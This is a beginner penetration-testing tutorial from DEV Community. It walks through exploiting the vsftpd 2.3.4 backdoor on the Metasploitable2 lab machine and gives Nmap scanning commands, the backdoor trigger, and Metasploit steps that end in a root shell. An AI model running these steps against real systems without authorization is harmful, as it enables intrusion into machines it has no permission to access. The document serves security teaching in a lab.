The latest articles on DEV Community by Alex Agyei (@lexisbil1). https://dev.to/lexisbil1 https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3909604%2F8e7bcc05-938b-43a0-bf9e-951a3d79822d.jpeg https://dev.to/lexisbil1 en Alex Agyei Tue, 05 May 2026 23:48:00 +0000 https://dev.to/lexisbil1/exploiting-vsftpd-234-on-metasploitable2-step-by-step-guide-for-beginners-4pem https://dev.to/lexisbil1/exploiting-vsftpd-234-on-metasploitable2-step-by-step-guide-for-beginners-4pem <p>One of the biggest turning points in learning cybersecurity is understanding how attackers move from:</p> <blockquote> <p><strong>Discovery → Exploitation → Access</strong></p> </blockquote> <p>In a training session I led, students went from running a simple scan to gaining <strong>root access</strong> on a vulnerable machine. The excitement was great — but the real value was understanding <em>how and why it worked</em>.</p> <p>In this guide, you'll replicate that exact process step by step.</p> <h2> What You’ll Learn </h2> <ul> <li>How to scan a target using Nmap</li> <li>How to identify vulnerable services</li> <li>How the vsftpd 2.3.4 backdoor works</li> <li>How to exploit it using Metasploit</li> <li>How to gain root access</li> </ul> <h2> Prerequisites </h2> <p>Make sure your lab is ready:</p> <ul> <li>Kali Linux (attacker)</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy2tqhb7c0dfymxiq0ou4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy2tqhb7c0dfymxiq0ou4.png" alt="Kali" width="800" height="401"></a></p> <ul> <li>Metasploitable2 (target)</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzrn8m95clodl77el1pfq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzrn8m95clodl77el1pfq.png" alt="Metaspoitable" width="749" height="443"></a></p> <ul> <li>Both machines on the same network (NAT or Host-only)</li> </ul> <h3> Step 1: Get the Target IP </h3> <p>On Metasploitable2:</p> <p>ifconfig</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa2d1zh4qnzut2k5v319n.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa2d1zh4qnzut2k5v319n.png" alt="Ipadrr" width="722" height="248"></a></p> <p>Look for something like:</p> <p>192.168.56.101</p> <h3> Step 2: Scan with Nmap </h3> <p>On Kali:</p> <p>nmap -sV target_ip</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftmg4eyvx7l55ydygl7vm.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftmg4eyvx7l55ydygl7vm.png" alt="nmapp" width="663" height="301"></a></p> <p>Why -sV matters</p> <p>Detects service versions<br> Helps you find known vulnerabilities</p> <p>Key Result<br> 21/tcp open ftp vsftpd 2.3.4</p> <p>👉 This is your entry point.</p> <h3> Step 3: Understand the Vulnerability </h3> <p>vsftpd 2.3.4 contains a backdoor.</p> <p>Trigger condition:<br> Login using a username ending with:<br> :)<br> What happens:<br> A shell opens on port 6200</p> <p>This is intentionally vulnerable — perfect for learning exploitation.</p> <h3> Step 4: Start Metasploit on kali </h3> <p>msfconsole</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1lv9r0kbtqvntffvixd5.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1lv9r0kbtqvntffvixd5.png" alt="msfc" width="672" height="487"></a></p> <h3> Step 5: Find the Exploit </h3> <p>search vsftpd</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyyrai5rku1me5cqzxsuz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyyrai5rku1me5cqzxsuz.png" alt="search" width="680" height="342"></a></p> <p>Expected result:<br> exploit/unix/ftp/vsftpd_234_backdoor</p> <h3> Step 6: Load the Exploit </h3> <p>use exploit/unix/ftp/vsftpd_234_backdoor</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdd7d8jfc2cs9syfsdi0z.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdd7d8jfc2cs9syfsdi0z.png" alt="used" width="662" height="118"></a></p> <h3> Step 7: Set Target IP </h3> <p>set RHOST target_ip</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs9h25vwmsnspx9pm6s0o.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs9h25vwmsnspx9pm6s0o.png" alt="rhost" width="676" height="77"></a></p> <h3> Step 8: Run the Exploit </h3> <p>run</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fya33bve04m1xvcqax8nm.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fya33bve04m1xvcqax8nm.png" alt="runn" width="658" height="183"></a><br> If successful:</p> <p>Command shell session 1 opened</p> <h3> Step 9: Confirm Access </h3> <p>whoami</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3pk84ap7amty1aodva0l.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3pk84ap7amty1aodva0l.png" alt="outt" width="681" height="176"></a></p> <p>Output:</p> <p>root</p> <p>🎉 You now have root access.</p> <p>Key Concepts (Simple Breakdown)</p> <p>Reconnaissance<br> Finding open ports and services<br> Example tool: Nmap</p> <p>Enumeration<br> Identifying versions and weaknesses<br> This is where real attack paths appear</p> <p>Exploitation<br> Using a vulnerability to gain access<br> In this case: a built-in backdoor</p> <p>Metasploit<br> A framework that automates exploitation<br> Saves time and standardizes attacks</p> <p>Common Beginner Mistakes</p> <ol> <li>Skipping Version Detection</li> </ol> <p>Wrong:</p> <p>nmap target_ip</p> <p>Correct:</p> <p>nmap -sV target_ip</p> <ol> <li>Using the Wrong IP Mixing attacker and target IP Using 127.0.0.1 incorrectly</li> </ol> <p>✔ Always verify:</p> <p>ifconfig</p> <ol> <li>Network Misconfiguration</li> </ol> <p>If nothing works:</p> <p>Check both VMs are on the same network</p> <ol> <li><p>Forgetting RHOST<br> set RHOST target_ip</p></li> <li><p>Blindly Running Exploits</p></li> </ol> <p>Don’t just run tools — ask:</p> <p>Why does this vulnerability exist?<br> What triggered it?<br> How would this look in a real system?<br> Pro Tips<br> Run deeper scans<br> nmap -A target_ip<br> Think like a professional</p> <p>Use a workflow:</p> <p>Scan<br> Identify<br> Research<br> Exploit<br> Validate<br> Conclusion</p> <p>This lab shows a complete beginner-friendly attack chain:</p> <p>Discover a service<br> Identify its version<br> Find a vulnerability<br> Exploit it<br> Gain access</p> <p>Even though this is a deliberately vulnerable system, the process is exactly how real penetration testing works.</p> <p>The goal is not just to hack — but to understand.</p> <p>Next Steps<br> Repeat this lab without guidance<br> Document it on GitHub (build your portfolio)<br> Try another vulnerable service on Metasploitable2<br> Final Note</p> <p>If you're learning cybersecurity:</p> <p>Stay consistent.<br> Stay curious.<br> Keep building.</p> <p>Follow for more hands-on cybersecurity labs and real-world breakdowns.</p> beginners tutorial cybersecurity linux